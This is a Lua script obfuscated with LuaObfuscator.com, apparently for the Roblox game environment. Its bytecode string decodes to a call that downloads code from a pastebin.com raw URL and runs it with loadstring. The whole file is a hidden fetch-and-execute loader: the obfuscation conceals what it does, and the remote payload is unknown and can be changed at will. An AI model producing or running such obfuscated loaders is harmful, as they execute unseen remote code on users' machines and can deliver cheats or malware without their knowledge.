--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v86=0;while true do if (v86==0) then v19=v0(v3(v30,1,1));return "";end end else local v87=0;local v88;while true do if (v87==0) then v88=v2(v0(v30,16));if v19 then local v131=0;local v132;while true do if (v131==0) then v132=v5(v88,v19);v19=nil;v131=1;end if (v131==1) then return v132;end end else return v88;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v89=0 -0 ;local v90;while true do if (v89==((1637 -(1523 + 114)) -(0 + 0))) then v90=(v31/((3 -1)^(v32-(2 -1))))%((2 -0)^(((v33-((1685 -(68 + 997)) -(555 + 64))) -(v32-(932 -(857 + 74)))) + (569 -(367 + 201)))) ;return v90-(v90%(928 -((1484 -(226 + 1044)) + 713))) ;end end else local v91=0 + 0 ;local v92;while true do if (v91==0) then v92=2^(v32-(1 + 0)) ;return (((v31%(v92 + v92))>=v92) and (878 -(282 + 595))) or 0 ;end end end end local function v21() local v34=(0 -0) -0 ;local v35;while true do if ((117 -(32 + 85))==v34) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=1 + 0 ;end if (v34==(958 -(892 + 65))) then return v35;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (3 -1) );v18=v18 + (3 -1) ;return (v37 * (606 -(87 + 263))) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + 4 ;return (v41 * (12302277 + 4474939)) + (v40 * (160901 -(379026 -283661))) + (v39 * (189 + 67)) + v38 ;end local function v24() local v42=v23();local v43=v23();local v44=953 -(802 + 150) ;local v45=(v20(v43,2 -1 ,63 -43 ) * ((3 -1)^(2 + 22 + 8))) + v42 ;local v46=v20(v43,1018 -(915 + 82) ,87 -56 );local v47=((v20(v43,32)==(1 + 0)) and  -1) or (1 -(0 + 0)) ;if (v46==(1187 -(1069 + 118))) then if (v45==((885 -(261 + 624)) -0)) then return v47 * (0 + (0 -0)) ;else local v118=0 + 0 ;while true do if (v118==(0 -(1080 -(1020 + 60)))) then v46=1 + 0 ;v44=0 -0 ;break;end end end elseif (v46==(3636 -1589)) then return ((v45==(1423 -(630 + 793))) and (v47 * ((1 + 0)/0))) or (v47 * NaN) ;end return v8(v47,v46-(1814 -(368 + 423)) ) * (v44 + (v45/((6 -4)^(70 -(10 + 8))))) ;end local function v25(v48) local v49;if  not v48 then local v93=0 -0 ;while true do if (v93==(0 -0)) then v48=v23();if (v48==(0 + 0)) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(3 -2) );v18=v18 + v48 ;local v50={};for v67=1748 -(760 + (2900 -(1789 + 124))) , #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return function(v94,v95,v96,v97,v98,v99,v100,v101) local v94=(function() return 0;end)();local v95=(function() return;end)();local v96=(function() return;end)();while true do if ( #":"~=v94) then else if (v95== #" ") then v96=(function() return v97()~=(469 -(159 + 310)) ;end)();elseif (v95==(4 -2)) then v96=(function() return v98();end)();elseif (v95~= #"-19") then else v96=(function() return v99();end)();end v100[v101]=(function() return v96;end)();break;end if (v94~=0) then else local v124=(function() return 0;end)();while true do if (0~=v124) then else v95=(function() return v97();end)();v96=(function() return nil;end)();v124=(function() return 1;end)();end if (v124==1) then v94=(function() return  #",";end)();break;end end end end return v94,v95,v96,v97,v98,v99,v100,v101;end;end)();local v52=(function() return function(v102,v103,v104,v105,v106,v107,v108,v109,v110) local v111=(function() return 935 -(39 + 896) ;end)();local v102=(function() return;end)();local v103=(function() return;end)();while true do if (v111==(1 -0)) then local v125=(function() return 0 -0 ;end)();while true do if (v125==0) then local v133=(function() return 0 -0 ;end)();while true do if (v133~=0) then else while true do if (v102==(0 + 0)) then v103=(function() return v104();end)();if (v105(v103, #"\\", #"|")~=0) then else local v165=(function() return 0 + 0 ;end)();local v166=(function() return;end)();local v167=(function() return;end)();local v168=(function() return;end)();while true do if (v165~=(399 -(115 + 281))) then else if (v105(v167, #"nil", #"-19")== #">") then v168[ #".dev"]=(function() return v108[v168[ #"?id="]];end)();end v109[v110]=(function() return v168;end)();break;end if (v165~=(4 -2)) then else if (v105(v167, #":", #"]")== #"[") then v168[2]=(function() return v108[v168[2]];end)();end if (v105(v167,2,2 + 0 )~= #"{") then else v168[ #"19("]=(function() return v108[v168[ #"xxx"]];end)();end v165=(function() return 7 -4 ;end)();end if (v165~=(0 -0)) then else local v186=(function() return 0;end)();while true do if (v186~=1) then else v165=(function() return 1;end)();break;end if (v186==0) then local v192=(function() return 0;end)();while true do if (v192~=(868 -(550 + 317))) then else v186=(function() return 1 -0 ;end)();break;end if (v192==0) then v166=(function() return v105(v103,2 -0 , #"91(");end)();v167=(function() return v105(v103, #"xnxx",6);end)();v192=(function() return 2 -1 ;end)();end end end end end if (v165==(286 -(134 + 151))) then v168=(function() return {v106(),v106(),nil,nil};end)();if (v166==(1665 -(970 + 695))) then local v190=(function() return 0 -0 ;end)();local v191=(function() return;end)();while true do if (v190==(1990 -(582 + 1408))) then v191=(function() return 0 -0 ;end)();while true do if (v191~=0) then else v168[ #"nil"]=(function() return v106();end)();v168[ #"asd1"]=(function() return v106();end)();break;end end break;end end elseif (v166== #"<") then v168[ #"-19"]=(function() return v107();end)();elseif (v166==2) then v168[ #"xxx"]=(function() return v107() -((2 -0)^(60 -44)) ;end)();elseif (v166~= #"gha") then else local v197=(function() return 0;end)();local v198=(function() return;end)();while true do if (v197==(1824 -(1195 + 629))) then v198=(function() return 0 -0 ;end)();while true do if (v198==0) then v168[ #"nil"]=(function() return v107() -((243 -(187 + 54))^16) ;end)();v168[ #"xnxx"]=(function() return v106();end)();break;end end break;end end end v165=(function() return 782 -(162 + 618) ;end)();end end end break;end end return v102,v103,v104,v105,v106,v107,v108,v109,v110;end end end end end if ((0 + 0)~=v111) then else local v126=(function() return 0;end)();local v127=(function() return;end)();while true do if (v126==(0 + 0)) then v127=(function() return 0 -0 ;end)();while true do if (v127==(1 -0)) then v111=(function() return 1;end)();break;end if (v127~=0) then else v102=(function() return 0 + 0 ;end)();v103=(function() return nil;end)();v127=(function() return 1637 -(1373 + 263) ;end)();end end break;end end end end end;end)();local v53=(function() return function(v112,v113,v114) local v115=(function() return 0;end)();while true do if (v115~=0) then else local v128=(function() return 1000 -(451 + 549) ;end)();while true do if (v128==(0 + 0)) then v112[v113-#":" ]=(function() return v114();end)();return v112,v113,v114;end end end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #"~",v58 do FlatIdent_23BE8,Type,Cons,v21,v24,v25,v59,v69=(function() return v51(FlatIdent_23BE8,Type,Cons,v21,v24,v25,v59,v69);end)();end v57[ #"asd"]=(function() return v21();end)();for v70= #"{",v23() do FlatIdent_74348,Descriptor,v21,v20,v22,v23,v59,v54,v70=(function() return v52(FlatIdent_74348,Descriptor,v21,v20,v22,v23,v59,v54,v70);end)();end for v71= #"/",v23() do v55,v71,v28=(function() return v53(v55,v71,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1 -0 ];local v65=v61[1386 -(746 + (703 -(30 + 35))) ];local v66=v61[2 + 1 + 0 ];return function(...) local v72=v64;local v73=v65;local v74=v66;local v75=v27;local v76=1 -(1257 -(1043 + 214)) ;local v77= -((1292 -950) -(218 + 123));local v78={};local v79={...};local v80=v12("#",...) -((1213 -(323 + 889)) + 0) ;local v81={};local v82={};for v116=0 + 0 ,v80 do if (v116>=v74) then v78[v116-v74 ]=v79[v116 + ((1509 -948) -(306 + 254)) ];else v82[v116]=v79[v116 + (581 -(361 + 219)) ];end end local v83=(v80-v74) + 1 + 0 ;local v84;local v85;while true do local v117=0 -0 ;while true do if (v117==((1788 -(53 + 267)) -(899 + 568))) then if (v85<=(4 + 2)) then if (v85<=(4 -2)) then if ((v85<=0) or (1804>=3275)) then v82[v84[605 -(268 + 335) ]]();elseif (v85==(291 -(60 + 230))) then local v137=572 -(426 + 146) ;local v138;while true do if (v137==(0 + 0)) then v138=v84[(330 + 1128) -(282 + 1174) ];v82[v138]=v82[v138](v13(v82,v138 + (812 -(569 + 242)) ,v77));break;end end else local v139=0 -0 ;local v140;local v141;while true do if (((1 + 0)==v139) or (1417>3629)) then v82[v140 + 1 ]=v141;v82[v140]=v141[v84[1028 -((1119 -(15 + 398)) + 318) ]];break;end if ((4795>402) and (v139==(1251 -(721 + 530)))) then v140=v84[1273 -((1927 -(18 + 964)) + 326) ];v141=v82[v84[3]];v139=2 -1 ;end end end elseif (v85<=4) then if (v85==(3 + 0)) then v82[v84[2]]=v84[3];else do return;end end elseif (v85==(705 -(271 + 429))) then v82[v84[2 + 0 ]]=v63[v84[3]];else local v146=v84[1502 -(1408 + 92) ];local v147,v148=v75(v82[v146](v13(v82,v146 + (1087 -(461 + 625)) ,v84[1291 -(993 + (1110 -815)) ])));v77=(v148 + v146) -(1 + 0) ;local v149=1171 -(418 + 753) ;for v161=v146,v77 do local v162=0 + 0 ;while true do if (v162==(0 + 0)) then v149=v149 + 1 + 0 ;v82[v161]=v147[v149];break;end end end end elseif ((4813>3565) and (v85<=(3 + 6))) then if ((3912==3912) and (v85<=(536 -(236 + 170 + 123)))) then v82[v84[1771 -(1749 + 20) ]]=v84[1 + 2 ];elseif ((2821<=4824) and (v85>(1330 -(1249 + 73)))) then local v150=v84[1 + 1 ];v82[v150]=v82[v150](v13(v82,v150 + (1146 -(466 + 428 + 251)) ,v77));else local v152=v84[4 -(852 -(20 + 830)) ];local v153,v154=v75(v82[v152](v13(v82,v152 + 1 ,v84[8 -(4 + 1) ])));v77=(v154 + v152) -1 ;local v155=1900 -(106 + 1794) ;for v163=v152,v77 do local v164=0 + 0 ;while true do if (v164==(0 + (126 -(116 + 10)))) then v155=v155 + (2 -(1 + 0)) ;v82[v163]=v153[v155];break;end end end end elseif (v85<=(29 -18)) then if (v85==(124 -(4 + 110))) then v82[v84[586 -(57 + 527) ]]=v63[v84[3]];else local v158=0;local v159;local v160;while true do if (v158==(1428 -((779 -(542 + 196)) + 1386))) then v82[v159 + 1 ]=v160;v82[v159]=v160[v84[107 -(17 + (184 -98)) ]];break;end if (v158==(0 + 0)) then v159=v84[3 -1 ];v160=v82[v84[8 -5 ]];v158=167 -(122 + 44) ;end end end elseif (v85==(20 -8)) then v82[v84[6 -(2 + 2) ]]();else do return;end end v76=v76 + 1 ;break;end if ((0 + 0)==v117) then v84=v72[v76];v85=v84[1 + 0 ];v117=(1 + 0) -0 ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403213Q00682Q7470733A2Q2F706173746562696E2E636F6D2F7261772F474B7A776B31477800083Q00120A3Q00013Q00120A000100023Q00200B000100010003001203000300044Q0008000100034Q00095Q00022Q000C3Q000100012Q00043Q00017Q00",v9(),...);
